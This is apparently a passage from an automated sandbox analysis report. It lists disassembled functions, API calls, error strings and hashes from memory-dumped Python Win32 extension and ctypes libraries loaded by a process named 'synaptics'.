                                                                                                                                                                                                              • ?PyWinObject_AsIID@@YAHPAU_object@@PAU_GUID@@@Z.PYWINTYPES310(?,?), ref: 6BF429E3
                                                                                                                                                                                                              • ?PyWinObject_AsIID@@YAHPAU_object@@PAU_GUID@@@Z.PYWINTYPES310(?,?), ref: 6BF42A08
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF42A35
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@@@Err_Object_U_object@@$FormatString
                                                                                                                                                                                                              • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$AddAccessAllowedObjectAce$The object is not a PySID object
                                                                                                                                                                                                              • API String ID: 1511484507-1373241943
                                                                                                                                                                                                              • Opcode ID: d10c97731e0c6468c643ad4f839d13521d3851ee6ff2ed9e0b1ac05424615163
                                                                                                                                                                                                              • Instruction ID: b1cf673f0e715d6db66ae988806c8041e30db15bf44795cec2ca465d996d8c4d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d10c97731e0c6468c643ad4f839d13521d3851ee6ff2ed9e0b1ac05424615163
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB61C273614201AFC704DF28D881A2EBBE5EF89315F40056DF94997273DB3AD925CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O:SetEntriesInAcl,?), ref: 6BF435D0
                                                                                                                                                                                                              • PySequence_Check.PYTHON310(?), ref: 6BF435E1
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Parm must be a list of EXPLICIT_ACCESS dictionaries), ref: 6BF435FA
                                                                                                                                                                                                              • PySequence_Size.PYTHON310(?), ref: 6BF43611
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4361F
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6BF4362F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EADFC,SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W), ref: 6BF43647
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(00000000), ref: 6BF437AD
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF437BB
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 6BF437D4
                                                                                                                                                                                                              • SetEntriesInAclW.ADVAPI32(00000000,00000000,?,?), ref: 6BF437FB
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetEntriesInAcl,00000000), ref: 6BF4380B
                                                                                                                                                                                                              • ?SetACL@PyACL@@QAEHPAU_ACL@@@Z.PYWINTYPES310(?), ref: 6BF4381B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W, xrefs: 6BF43640
                                                                                                                                                                                                              • O:SetEntriesInAcl, xrefs: 6BF435BB
                                                                                                                                                                                                              • SetEntriesInAcl, xrefs: 6BF43806
                                                                                                                                                                                                              • lllO, xrefs: 6BF436E7
                                                                                                                                                                                                              • EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}, xrefs: 6BF43716
                                                                                                                                                                                                              • Parm must be a list of EXPLICIT_ACCESS dictionaries, xrefs: 6BF435F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_FreeSequence_String$Arg_CheckEntriesError@@L@@@LocalMem_ParseSizeTupleU_object@@Win_freemallocmemset
                                                                                                                                                                                                              • String ID: EXPLICIT_ACCESS must be a dictionary containing {AccessPermissions:int,AccessMode:int,Inheritance:int,Trustee:<o PyTRUSTEE>}$O:SetEntriesInAcl$Parm must be a list of EXPLICIT_ACCESS dictionaries$SetEntriesInAcl$SetEntriesInAcl: unable to allocate EXPLICIT_ACCESS_W$lllO
                                                                                                                                                                                                              • API String ID: 2479116710-1140684800
                                                                                                                                                                                                              • Opcode ID: 0bd84d03a76823068f3db5e44436dcf29e64e8d9ebfb17c7c3dabb0c995f0748
                                                                                                                                                                                                              • Instruction ID: cf22abb50ca1a66ce0fb440b1a1cc80ae5db5c9d4e54afdbaf313d1771da87c0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bd84d03a76823068f3db5e44436dcf29e64e8d9ebfb17c7c3dabb0c995f0748
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B87180B29183019FDB10DF24C884A1BBFF4FF99314F004579F99996222E739DA58CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,|l:SECURITY_DESCRIPTOR,?,80D07A71), ref: 6BF462E1
                                                                                                                                                                                                              • ??0PySECURITY_DESCRIPTOR@@QAE@H@Z.PYWINTYPES310(00000014), ref: 6BF462FC
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: _Py_NewReference.PYTHON310(?,?,?,?,?,6BF41767,00000000), ref: 6BF473CE
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,6BF41767,00000000), ref: 6BF473E3
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 6BF473F8
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4740E
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: GetSecurityDescriptorLength.ADVAPI32(00000000), ref: 6BF47419
                                                                                                                                                                                                                • Part of subcall function 6BF473C0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF4742A
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310(00000014), ref: 6BF4630D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EB154,Security descriptors are not supported on this platform), ref: 6BF46323
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF46332
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF46350
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF463A5
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(00000000,?,00000000), ref: 6BF463B7
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?), ref: 6BF463DA
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,Security descriptor created from a buffer must be self relative), ref: 6BF463F0
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6BF4640A
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O:SECURITY_DESCRIPTOR,?), ref: 6BF46367
                                                                                                                                                                                                                • Part of subcall function 6BF4BDF7: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • ??0PySECURITY_DESCRIPTOR@@QAE@PAX@Z.PYWINTYPES310(?), ref: 6BF46448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Buffer cannot be None, xrefs: 6BF4639E
                                                                                                                                                                                                              • O:SECURITY_DESCRIPTOR, xrefs: 6BF46361
                                                                                                                                                                                                              • Security descriptors are not supported on this platform, xrefs: 6BF4631C
                                                                                                                                                                                                              • Data is not a valid security descriptor, xrefs: 6BF463E4
                                                                                                                                                                                                              • |l:SECURITY_DESCRIPTOR, xrefs: 6BF462D4
                                                                                                                                                                                                              • Security descriptor created from a buffer must be self relative, xrefs: 6BF46431
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$DescriptorSecurityString$Arg_ParseTuplefreemalloc$BufferBuffer_ClearDeallocInitializeLengthObject_OccurredReferenceReleaseValid
                                                                                                                                                                                                              • String ID: Buffer cannot be None$Data is not a valid security descriptor$O:SECURITY_DESCRIPTOR$Security descriptor created from a buffer must be self relative$Security descriptors are not supported on this platform$|l:SECURITY_DESCRIPTOR
                                                                                                                                                                                                              • API String ID: 1036624285-1069302536
                                                                                                                                                                                                              • Opcode ID: da8f6b9f18c99ccabb7673cd7529d38e9fa0060b780e48ee29839cc6c69e475b
                                                                                                                                                                                                              • Instruction ID: 38a3fa84c1d07977f10f8a2c125e7744dcf9725938d63b061e7226b0413a8c9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da8f6b9f18c99ccabb7673cd7529d38e9fa0060b780e48ee29839cc6c69e475b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65417373E14115ABDF04DF64DC45BAE7BB8EB15718F0005AAE805D3362E739A918CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyGILState_Ensure.PYTHON310 ref: 6C0A9164
                                                                                                                                                                                                              • PyUnicode_InternFromString.PYTHON310(_ctypes.DllCanUnloadNow), ref: 6C0A917B
                                                                                                                                                                                                              • PyImport_ImportModuleNoBlock.PYTHON310(ctypes), ref: 6C0A918F
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6C0A919E
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(?), ref: 6C0A91AC
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(00000000,DllCanUnloadNow), ref: 6C0A91C3
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A91D4
                                                                                                                                                                                                                • Part of subcall function 6C0A8610: PyThreadState_Get.PYTHON310(?,-000000FF,6C0A921C), ref: 6C0A8614
                                                                                                                                                                                                                • Part of subcall function 6C0A8610: _Py_CheckFunctionResult.PYTHON310(00000000,00000000,00000000,00000000), ref: 6C0A8640
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A91F2
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(?), ref: 6C0A9204
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A922A
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A924C
                                                                                                                                                                                                              • PyLong_AsLong.PYTHON310(00000000), ref: 6C0A925A
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A9265
                                                                                                                                                                                                              • PyErr_WriteUnraisable.PYTHON310(6C7F20B8), ref: 6C0A9280
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A9294
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(?), ref: 6C0A929E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_State_$DeallocReleaseUnraisableWrite$String$AttrBlockCheckClearEnsureFromFunctionImportImport_InternLongLong_ModuleObject_OccurredResultThreadUnicode_
                                                                                                                                                                                                              • String ID: DllCanUnloadNow$_ctypes.DllCanUnloadNow$ctypes
                                                                                                                                                                                                              • API String ID: 356857724-4136862661
                                                                                                                                                                                                              • Opcode ID: 86d6990c7d3e9fe0cf9b7f7d628bb77bb1eb7beb9516c67ba88b61dbf30ebf7a
                                                                                                                                                                                                              • Instruction ID: 77ab1be87a31a7404c7f064382690f9724156e8df1fc09ae285afac56d0585b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86d6990c7d3e9fe0cf9b7f7d628bb77bb1eb7beb9516c67ba88b61dbf30ebf7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 573128F1B042419BDF04CBE89D4869A33F8EB0267DB040278EE1AD7201EF378C15879A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,Os:in_dll,?,?), ref: 6C0A1AE8
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.dlsym,6C0B0588,?), ref: 6C0A1B00
                                                                                                                                                                                                              • PyObject_GetAttrString.PYTHON310(?,_handle), ref: 6C0A1B15
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,the _handle attribute of the second argument must be an integer), ref: 6C0A1B3D
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A1B4C
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310(00000000), ref: 6C0A1B5E
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0A1B6F
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A1B78
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,could not convert the _handle attribute to a pointer), ref: 6C0A1B8E
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310 ref: 6C0A1B9F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6C0A1BAB
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(00000000), ref: 6C0A1BB4
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,symbol '%s' not found,?), ref: 6C0A1BD0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ctypes.dlsym, xrefs: 6C0A1AFB
                                                                                                                                                                                                              • _handle, xrefs: 6C0A1B0D
                                                                                                                                                                                                              • could not convert the _handle attribute to a pointer, xrefs: 6C0A1B87
                                                                                                                                                                                                              • symbol '%s' not found, xrefs: 6C0A1BC9
                                                                                                                                                                                                              • Os:in_dll, xrefs: 6C0A1AE2
                                                                                                                                                                                                              • the _handle attribute of the second argument must be an integer, xrefs: 6C0A1B36
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$String$DeallocEval_Thread$AddressArg_AttrAuditFormatLong_Object_OccurredParseProcRestoreSaveSizeSys_Tuple_Void
                                                                                                                                                                                                              • String ID: Os:in_dll$_handle$could not convert the _handle attribute to a pointer$ctypes.dlsym$symbol '%s' not found$the _handle attribute of the second argument must be an integer
                                                                                                                                                                                                              • API String ID: 1915345233-3856192562
                                                                                                                                                                                                              • Opcode ID: 5afd80ab79a024da6cf1cbe7cb66536a01eeb6efd4774c576fdbb1b5d07da4d7
                                                                                                                                                                                                              • Instruction ID: e18cd3f1971ecdcbe944ac8426ba3e7a2adff49d07cfe3cf81475cd2ede808d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5afd80ab79a024da6cf1cbe7cb66536a01eeb6efd4774c576fdbb1b5d07da4d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0531EAB1A18140ABCB01DBA4DE09ADA37F9DF4522DF040564FD0EA2511EF339615CB99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(too many arguments (%zi), maximum is %i,?,00000400,?,00000000,00000000,?,?,?,?,?,?,?,?,6C0A5C4F,00000000), ref: 6C0AA3FA
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310(?,00000000,00000000,?,?,?,?,?,?,?,?,6C0A5C4F,00000000,?,?,?), ref: 6C0AA42E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatMemory
                                                                                                                                                                                                              • String ID: 0bal$GetResult$O\l$_ctypes/callproc.c$argument %zd: $too many arguments (%zi), maximum is %i
                                                                                                                                                                                                              • API String ID: 2412010639-91346004
                                                                                                                                                                                                              • Opcode ID: 4b0ecba2c87afa2b27569e12073b17eb8ffa36262f5ad39caaf6d506ee703e64
                                                                                                                                                                                                              • Instruction ID: dca6b24e2e9f819d3de8c444c6beb65a054db92c44cb8eb9606a60efde17ad21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b0ecba2c87afa2b27569e12073b17eb8ffa36262f5ad39caaf6d506ee703e64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE17EB1E002059FDB04CFE9C880B9EB7F5AF49318F244129E916A7792D731A947CF95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,paramflags must be a tuple or None), ref: 6C0A4DCE
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,paramflags must have the same length as argtypes), ref: 6C0A4DF7
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,'out' parameter %d must be a pointer type, not %s,6C0B6111,6C0B2D20), ref: 6C0A4F43
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A4F9E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • paramflags must be a tuple or None, xrefs: 6C0A4DC7
                                                                                                                                                                                                              • i|OO, xrefs: 6C0A4E35
                                                                                                                                                                                                              • paramflags must have the same length as argtypes, xrefs: 6C0A4DF0
                                                                                                                                                                                                              • paramflags must be a sequence of (int [,string [,value]]) tuples, xrefs: 6C0A4F79
                                                                                                                                                                                                              • abstract class, xrefs: 6C0A4F97
                                                                                                                                                                                                              • PzZ, xrefs: 6C0A4EEF
                                                                                                                                                                                                              • 'out' parameter %d must be a pointer type, not %s, xrefs: 6C0A4F3C
                                                                                                                                                                                                              • paramflag value %d not supported, xrefs: 6C0A4F5B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$String$Format
                                                                                                                                                                                                              • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ$abstract class$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes
                                                                                                                                                                                                              • API String ID: 3672300421-2710726568
                                                                                                                                                                                                              • Opcode ID: 9ff1f87168d8549c8b5a02ab927b6cd19a6c583ab194aa80524fcefdf3d0f6c2
                                                                                                                                                                                                              • Instruction ID: 6757a8b1378d02bfe4c723dcf955c232d9166d9191170c5dd1619eff30d3d52f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ff1f87168d8549c8b5a02ab927b6cd19a6c583ab194aa80524fcefdf3d0f6c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB61E135709154AFDB00CFD8EA80B99B3F8EB45319F1455A5E909D7A12EF33E816CB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EB154,%s not supported by this version of Windows,AddAccessAllowedAceEx,?,?), ref: 6BF426CD
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object,?,?,?,?,?), ref: 6BF426FE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatString
                                                                                                                                                                                                              • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$AddAccessAllowedAceEx$The object is not a PySID object
                                                                                                                                                                                                              • API String ID: 4212644371-3491874531
                                                                                                                                                                                                              • Opcode ID: 0e9fde05aee7d6099b426eedfa95bb0e0948219442c7809a7fdc6562781f15f2
                                                                                                                                                                                                              • Instruction ID: 76e71ee928ae26664b1888cc8b69a9d28cf894750398b513aaa98dac84fb3091
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9fde05aee7d6099b426eedfa95bb0e0948219442c7809a7fdc6562781f15f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 474107335202016FD701AB28EC41A2A7FA4EF45319F444579F94986233D73BD929CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EB154,%s not supported by this version of Windows,AddAccesAllowedAce,?,?,?,?), ref: 6BF42423
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object,?,?,?,?,?,?), ref: 6BF4244D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$FormatString
                                                                                                                                                                                                              • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$AddAccesAllowedAce$The object is not a PySID object
                                                                                                                                                                                                              • API String ID: 4212644371-2803321650
                                                                                                                                                                                                              • Opcode ID: 6d957880063f188edba6c8d91094d5bf995ec8f19da1e7beacb157704efa03b9
                                                                                                                                                                                                              • Instruction ID: 6a15c8fcdf1adec0dcb92325e122b9ff847362e04a1b47dc047e7643f90f52a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d957880063f188edba6c8d91094d5bf995ec8f19da1e7beacb157704efa03b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F74106335601106BD705AB28EC45A7A7FA4FB86765F4404B9FD0887233E72AD92C97B2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,Oi:SetSecurityDescriptorOwner,00000000,?), ref: 6BF46E8D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PySID object), ref: 6BF46EBF
                                                                                                                                                                                                              • IsValidSid.ADVAPI32(?), ref: 6BF46ED9
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorGroup - invalid sid,00000000), ref: 6BF46EE9
                                                                                                                                                                                                              • ?_MakeAbsoluteSD@@YAHPAXPAPAX@Z.PYWINTYPES310(?,?), ref: 6BF46F05
                                                                                                                                                                                                                • Part of subcall function 6BF46640: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF466A3
                                                                                                                                                                                                                • Part of subcall function 6BF46640: PyErr_Format.PYTHON310(6C7EADFC,Unable to allocate %d bytes,?), ref: 6BF466BE
                                                                                                                                                                                                              • GetSecurityDescriptorGroup.ADVAPI32(?,?,?), ref: 6BF46F20
